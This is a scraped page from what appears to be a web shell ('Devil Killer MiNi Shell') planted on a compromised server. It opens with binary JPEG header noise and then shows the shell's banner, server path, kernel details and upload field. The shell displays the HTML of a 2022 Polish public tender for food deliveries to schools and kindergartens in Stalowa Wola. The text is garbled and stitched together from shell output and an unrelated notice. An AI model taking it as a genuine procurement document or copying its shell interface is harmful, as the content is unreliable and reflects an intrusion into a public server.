JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220510/0015082701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów ogólnospożywczych <br/>dla wskazanych jednostek podległych Gminie Stalowa Wola w roku 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stalowowolskie Centrum Usług Wspólnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384503002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jana Pawła II 25A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stalowa Wola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">scuw@stalowawola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.stalowawola.pl//?c=mdTresc-cmPokaz-1657</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów ogólnospożywczych <br/>dla wskazanych jednostek podległych Gminie Stalowa Wola w roku 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2c84f940-cd12-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00150827</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040234/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.2.6 Sukcesywna dostawa art. ogólnospożywczych na potrzeby jednostek podległych Gminie Stalowa Wola</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2c84f940-cd12-11ec-b879-9a86e5ac3946 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Centralny Zamawiający, a Wykonawcami odbywa się przy użyciu Platformy e-<br/>Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl lub przy użyciu poczty elektronicznej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym (SCUW) a Wykonawcami odbywa się przy użyciu platformy: e-zamówienia, która<br/>jest dostępna pod adresem: https://ezamowienia.gov.pl/, lub przy użyciu poczty elektronicznej.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować się na<br/>Platformie e-zamówienia. Platforma jest dostępna dla każdego zalogowania użytkownika. Rodzaj dostępnych formularzy zależy od<br/>posiadanego na Platformie konta.<br/>Użytkownik zalogowany jako konto uproszczone ma dostępne formularze:<br/>- Wniosek – służący do zadawania pytań do SWZ,<br/>- Inne.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji interaktywnej korzystania z platformy<br/>ezamówienia<br/>pod adresem:<br/>https://epzpygmggrsicd.blob.core.windows.net/pod/2021/10/Komunikacji-wpostepowaniu-3.2_20211016.pdf<br/>4. Składanie ofert/wniosków/prac konkursowych dostępne jest tylko dla użytkowników będących Wykonawcami, posiadającymi<br/>uprawnienie do składania ofert/wniosków/prac konkursowych. W celu założenia oferty należy przejść do szczegółów postępowania,<br/>wybrać zakładkę oferty/wnioski, następnie przycisk złóż ofertę.<br/>5. Ofertę należy złożyć na właściwym formularzu (aktualnym formularzu ofertowym pobranym z platformy do tego postępowania) –<br/>jeśli formularz będzie nieprawidłowy system poinformuje o tym w trakcie składania oferty.<br/>6. W celu pobrania wzorców formularza (ofertowego, wniosku o dopuszczenie do udziału w postępowaniu lub konkursowego) oraz<br/>pozostałych dokumentów postępowania należy przejść do szczegółów postępowania.<br/>7. Funkcjonalność wypełnienia formularza dostępna jest tylko dla użytkowników będących Wykonawcami posiadającymi uprawnienie<br/>do Przygotowania ofert/wniosków/prac konkursowych.<br/>8. Ofertę należy złożyć przed terminem składania ofert – oferta złożona po terminie nie zostanie przyjęta.<br/>9. Formularz ofertowy i złączniki należy podpisać cyfrowo. Dokumenty można podpisać podpisem kwalifikowanym. Wypełniony<br/>formularz oferty podpisujemy podpisem wewnętrznym. Załączniki można podpisać podpisem zewnętrznym lub wewnętrznym.<br/>Dokumenty spakowane należy podpisać zewnętrznym. Jeśli będzie brakowało podpisu system poinformuje o tym w trakcie składania<br/>dokumentów, zostaną one przyjęte przez Platformę mimo braku podpisu.<br/>10. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>rkordyka@stalowawola.pl lub zp@stalowawola.pl.<br/>11. Szczegółowa instrukcja dotycząca składania ofert dostępna jest pod adresem:<br/>https://epzpygmggrsicd.blob.core.windows.net/pod/2021/10/Oferty-3.2¬¬_20211016.pdf<br/>12. Osoby ze strony zamawiającego upoważnione do kontaktowania się<br/>z Wykonawcami są:<br/> Rafał Kordyka – Dział Zamówień Publicznych Stalowowolskiego Centrum Usług Wspólnych ul. Jana Pawła II 25 A, tel. (15) 819-47-<br/>44, adres email: rkordyka@stalowawola.pl lub zp@stalowawola.pl - w sprawach proceduralnych;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Dyrektor Stalowowolskiego Centrum Usług Wspólnych al. Jana Pawła II 25A,<br/>37-450 Stalowa Wola – Pani Danuta Bednarz.<br/> inspektorem ochrony danych osobowych w Stalowowolskim Centrum Usług Wspólnych jest Pan Grzegorz Madej prowadzący<br/>działalność gospodarczą pn. IURATUS Grzegorz Madej, z siedzibą pod adresem Bodzanów 467, 32-020 Wieliczka, adres e-mail:<br/>iod.scuw@stalowawola.pl.<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego „Świadczenie usług serwisowych i konserwacji systemów oraz sprżetu komputerowego na<br/>stadionie PCPN w Stalowej Woli” prowadzonym w trybie zamówienia podstawowego zgodnie z art. 275 pkt 1 ustawy Pzp.<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp.<br/> Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 1 ustawy - Dostawy<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 1 ustawy - Usługi<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/> posiada Pani/Pan:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-II.271.72.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów ogólnospożywczych dla wskazanych jednostek podległych<br/>Gminie Stalowa Wola w roku 2022 r, określonych według grup asortymentowo – cenowych dla poszczególnych jednostek<br/>obsługiwanych stanowiących załącznik nr 2 (Formularz asortymentowo-cenowy) do specyfikacji istotnych warunków<br/>zamówienia :<br/>2. Zakres zamówienia obejmuje sukcesywne dostawy dla jednostek organizacyjnych będących jednocześnie płatnikami<br/>umowy:<br/>1. Przedszkole nr 1<br/>ul. Niezłomnych 2A<br/>37-450 Stalowa Wola<br/>2. Przedszkole nr 2 im. Jana Brzechwy<br/>Al. Jana Pawła II 25A<br/>37-450 Stalowa Wola<br/>3. Przedszkole nr 3<br/>ul. Poniatowskiego 57<br/>37-450 Stalowa Wola<br/>4. Przedszkole nr 4<br/>ul. Wańkowicza 72/1<br/>37-450 Stalowa Wola<br/>5. Przedszkole nr 5 im. Juliana Tuwima<br/>ul. Mieszka I-go 5<br/>37-450 Stalowa Wola<br/>6. Przedszkole nr 6<br/>ul. Partyzantów 10<br/>37-450 Stalowa Wola<br/>7. Przedszkole nr 7 im. M. Konopnickiej<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>ul. Ks. J. Popiełuszki 29a<br/>37-450 Stalowa Wola<br/>8. Przedszkole nr 9<br/>Al. Jana Pawła II 5<br/>37-450 Stalowa Wola<br/>9. Przedszkole nr 10 im. Marii Kownackiej<br/>Al. Jana Pawła II 11<br/>37-450 Stalowa Wola<br/>10. Przedszkole nr 11<br/>Al. Jana Pawła II 6<br/>37-450 Stalowa Wola<br/>11. Przedszkole Integracyjne nr 12 im. J. Ch. Andersena<br/>ul. Okulickiego 20<br/>37-450 Stalowa Wola<br/>12. Przedszkole nr 15<br/>ul. Obrońców Westerplatte 1<br/>37-450 Stalowa Wola<br/>13. Przedszkole nr 18<br/>ul. Poniatowskiego 33<br/>37-450 Stalowa Wola<br/>14. Publiczna Szkoła Podstawowa nr 1 im. Wacława Górskiego<br/>ul. Romana Dmowskiego 9<br/>37-450 Stalowa Wola<br/>15. Publiczna Szkoła Podstawowa nr 3 im. Bohaterów Westerplatte<br/>ul. Prymas Wyszyńskiego 14<br/>37-450 Stalowa Wola<br/>16. Publiczna Szkoła Podstawowa nr 4 im. E. Kwiatkowskiego<br/>ul. Niezłomnych 1<br/>37-450 Stalowa Wola<br/>17. Publiczna Szkoła Podstawowa nr 5 im. Energetyków<br/>ul. Energetyków 18<br/>37-450 Stalowa Wola<br/>18. Publiczna Szkoła Podstawowa nr 11 im. Szarych Szeregów<br/>ul. Wojska Polskiego 9<br/>37-450 Stalowa Wola<br/>19. Publiczna Szkoła Podstawowa nr 12 im. Jana Pawła II<br/>ul. J. Poniatowskiego 55<br/>37-450 Stalowej Woli<br/>20. Żłobek Miejski w Stalowej Woli<br/>Al. Jana Pawła II 5A<br/>37-450 Stalowa Wola<br/>21. Miejski Żłobek Integracyjny<br/>ul. Poniatowskiego 55 A<br/>37-450 Stalowej Wola<br/>22. Miejski Ośrodek Pomocy Społecznej<br/>ul. Dmowskiego 1<br/>37-450 Stalowa Wola<br/>23. Środowiskowy Dom Samopomocy nr 1<br/>ul. Popiełuszki 29<br/>37-450 Stalowa Wola<br/>24. Środowiskowy Dom Samopomocy nr 2<br/>ul. Wańkowicza 72/2<br/>37-450 Salowa Wola<br/>25. Miejski Ośrodek Sportu i Rekreacji<br/>ul. Hutnicza 15<br/>37-450 Stalowa Wola<br/>26. Urząd Miasta Stalowa Wola<br/>ul. Wolności 7<br/>37-450 Stalowa Wola<br/>3. Przedmiot zamówienia będzie realizowany sukcesywnie w ilościach wynikających z zapotrzebowania składanych<br/>bezpośrednio przez Jednostkę obsługiwaną. Dostawy następować będą na podstawie telefonicznego lub pisemnego<br/>zamówienia, którego dokona pracownik upoważniony przez jednostkę.<br/>4. Ceny jednostkowe artykułów spożywczych nie podlegają podwyższeniu przez cały okres obowiązywania umowy.<br/>5. Ilości określone w formularzu asortymentowo-cenowym są szacunkowe i trakcie realizacji umowy mogą uleć<br/>zmniejszeniu/zwiększeniu, a Wykonawcy nie przysługuje z tego względu żadne roszczenie odszkodowawcze.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>6. Wykonawca dostarczać będzie zamówioną partię towaru do wskazanych jednostek w dni robocze w godzinach<br/>określonych przez daną jednostkę Zamawiającego, własnym środkiem transportu i na własne ryzyko oraz nie będzie<br/>obciążać kosztami transportu jednostkę. Wykonawca zobowiązany jest do wniesienia towarów do magazynów<br/>żywnościowych wskazanych przez Zamawiających znajdujących się w obiektach danych jednostek nie zależnie od tego czy<br/>miejsce magazynowe znajduje się na paterze czy piętrze np. stołówki przedszkolnej.<br/>7. Wszystkie oferowane artykuły muszą pochodzić z bieżącej produkcji oraz muszą być pełnowartościowe w pierwszym<br/>gatunku, tzn. bez śladów uszkodzenia, opakowane oryginalnie z widocznym terminem przydatności do użytku. Opakowania<br/>mają być nienaruszone, posiadać zabezpieczenia zastosowane przez producenta oraz znaki identyfikujące produkt, a w<br/>szczególności znak towarowy produktu lub markę producenta artykułu. Jakość oferowanych artykułów powinna być zgodna<br/>z Polskimi Normami i obowiązującymi w tym zakresie przepisami.<br/>8. Upoważnieni pracownicy poszczególnych jednostek (intendent i szefowa kuchni) będą dokonywać odbioru towaru pod<br/>względem ilościowo-wartościowym oraz obowiązujących norm jakościowych. Jednostek przysługuje prawo odmowy<br/>przyjęcia towaru w przypadku wad ilościowych lub jakościowych.<br/>9. W przypadku zakwestionowania przez daną jednostkę obsługiwaną dostarczonego towaru Wykonawca zobowiązuje się<br/>do jego wymiany na pełnowartościowy, w terminie nie dłuższym niż 2 dni robocze od zgłoszenia reklamacji. W przypadku<br/>nie dostarczenia pełnowartościowego towaru po zgłoszonej reklamacji Jednostka obsługiwana uprawniona jest do zakupu<br/>w/w towaru na koszt wykonawcy. Czas reklamacji stanowi poza cenowe kryterium oceny ofert (Kt)<br/>10. Zakwestionowany towar zostanie zwrócony Wykonawcy i odebrany transportem na koszt Wykonawcy. Jednostka<br/>obsługiwana nie odpowiada za straty poniesione przez Wykonawcę z tytułu zwrotu kwestionowanej partii towaru. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający zastrzega zastosowanie prawa opcji o którym mowa w art. 441 PZP do zwiększenia zakresu zamówienia<br/>sukcesywnej dostawy artykułów ogólnospożywczych dla jednostek organizacyjnych Gminy Stalowa Wola.<br/>2. Zamawiający może z prawa opcji nie skorzystać, lub skorzystać w części. Zamówienie realizowane w ramach opcji jest<br/>jednostronnym uprawnieniem Zamawiającego. Nie skorzystanie przez Zamawiającego z prawa opcji nie rodzi po stronie<br/>Wykonawcy żadnych roszczeń w stosunku do Zamawiającego. Specyfikacja Warunków Zamówienia dla zadania:<br/>Sukcesywna dostawa artykułów ogólnospożywczych dla wskazanych jednostek podległych Gminie Stalowa Wola<br/>3. Zamówienie objęte opcją Wykonawca będzie zobowiązany wykonać po uprzednim wyrażeniu przez Niego zgody w<br/>formie pisemnej w ciągu 7 dni od otrzymania zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać.<br/>Zamawiający zastrzega możliwość skorzystania z prawa opcji nie później niż do 31 października 2022 r.<br/>4. W przypadku nie złożenia żadnego oświadczenia lub brak zgody ze strony Wykonawcy na realizację prawa opcji<br/>uprawnienie Zamawiającego do skorzystania z prawa opcji wygasa.<br/>5. Zamawiający przewiduje możliwość przedłużenia umowy w ramach prawa opcji do 30.06.2023 r.<br/>6. W stosunku do zamówienia opcjonalnego złożonego do 31 października 2022 roku, Wykonawca będzie obowiązany do<br/>jego realizacji w przypadku wyrażenia zgody w formie pisemnej w ciągu 7 dni od otrzymania zawiadomienia od<br/>Zamawiającego, że zamierza z prawa opcji skorzystać, zaś w stosunku do zamówienia złożonego przez Zamawiającego w<br/>terminie późniejszym niż 31 października, uprawnienie Zamawiającego do skorzystania z prawa opcji wygasa.<br/>7. Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji<br/>zamówienia podstawowego. Zamawiający zastrzega również, że ceny jednostkowe objęte opcją będą identyczne, jak w<br/>zamówieniu podstawowym. Dodatkowe szczegóły związane z prawem opcji zawarte są we wzorze umowy stanowiącym<br/>załącznik do SWZ. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-07-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reklamacji towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 